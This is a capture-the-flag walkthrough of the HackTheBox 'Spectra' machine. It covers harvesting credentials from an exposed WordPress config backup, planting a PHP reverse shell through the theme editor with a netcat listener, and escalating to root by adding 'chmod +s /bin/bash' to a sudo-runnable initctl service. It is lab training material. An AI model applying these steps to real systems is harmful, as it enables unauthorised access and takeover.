Before we start, make sure you have connected to the HackTheBox network via OpenVPN.
NMAP
First of all, let’s start with an Nmap scan to identify the list of services running on the system.
We see that there are 3 ports open :
22/tcp- SSH
80/tcp- HTTP
3306/tcp — MySQL
Web Server
There is a web server available on port 80. Before exploring the web application, add the Spectra IP and the htb domain to /etc/hosts.
10.10.10.229 spectra.htb
In the web application, we find 2 different links. One of them redirects us to a simple WordPress site called “Software Issue Management”. At first glance, we see a potential username — ‘administrator’. It may come in handy if we find a password.
The other link (http://spectra.htb/testing) consists of many files. It is probably a backup of the WordPress site.
After exploring these files, I found a juicy one. Let’s download and see the content.
http://spectra.htb/testing/wp-config.php.save
Checking the wp-config.php.save file, I found credentials of a database. Earlier we found a potential username ‘administrator’.If the owner of this website has a tendency to reuse the passwords, we might make use of that. Let’s combine this password with the username to login to WordPress.
Credentials
Yes! It worked. We are now logged in.
From now on, we might use Metasploit to get a reverse shell or manually edit one of the PHP files of the web application to get a shell. I always choose a manual way over an automated one but for the sake of this write-up, I will show both ways.
Metasploit way
Let’s search for wp-admin reverse shell.
We need to add the password, username, RHOST, RPORT, TARGETURI, LHOST, and LPORT.
RHOST - ip adress of the target machine
RPORT - port of the target machine (in this case port 80)
TARGETURI - where you set the target url (in this case /main)
LHOST - ip adress of your machine (ifconfig)
LPORT - listening port
Everything is ready, let’s run!
We can get rid of the meterpreter shell by executing the ‘shell’ command. Now we have a stable reverse shell.
Manual way
We need to edit the code of one PHP file, and inject our ‘php-reverse-shell’.
http://spectra.htb/main/wp-admin/theme-editor.php?file=404.php&theme=twentynineteen
You can download the PHP reverse shell from here.
Don’t forget to change the default IP address and the port in the reverse shell. Uploading it gives use positive feedback. Let’s execute the code.
While executing, you need to listen to the port which you specified.
nc -lvnp 1234
Visiting this link will give us a reverse shell.
http://spectra.htb/main/wp-content/themes/twentynineteen/404.php
This shell is not stable, however, to make it stable you can use python3.
python3 -c "import pty; pty.spawn('/bin/bash')"
You can learn more about upgrading Simple Shells to Fully Interactive TTYs here.
User flag
Checking the home directory, we see that 5 users are available in this system.
There is a user.txt in Katie's home folder, but we don’t have permission to read it. There should be a way to privilege escalation.
Let’s explore more!
Before running any automated scripts(linpeas,linenum), I always check crontabs, ‘/opt’, and ‘/tmp’ directories.
There is an interesting file called ‘autologin.conf.orig’ in /opt directory.
Code implies that there is a password file in /etc/autologin. Let’s check that out.
Aye! There is actually a password. It might be the credential for ‘Katie’ user.
I have sshed as Katie, and it worked. We can now read the user flag.
Root flag
Now we have to work towards root user (vertical privilege escalation). Let’s run ‘sudo -l’ to see whether we can run anything as root.
There is a binary called ‘initctl’ that we can run as root without a password.
There are so many files, we only need to check ones that look suspicious.
These test files might include something juicy. Let’s read the content.
‘Test.conf’ is a bash script for testing node.js. We can also edit that file because we are in the developers' group. We can stop this ‘test’ service, add a reverse shell or simply add ‘chmod +s /bin/bash’ command to run bash as root, and when we start the ‘test’ service again. Our malicious code should be run.
sudo /sbin/initctl stop test
sudo /sbin/initctl start test
Now we are root!
Checking the /root folder, we will find the root.txt flag.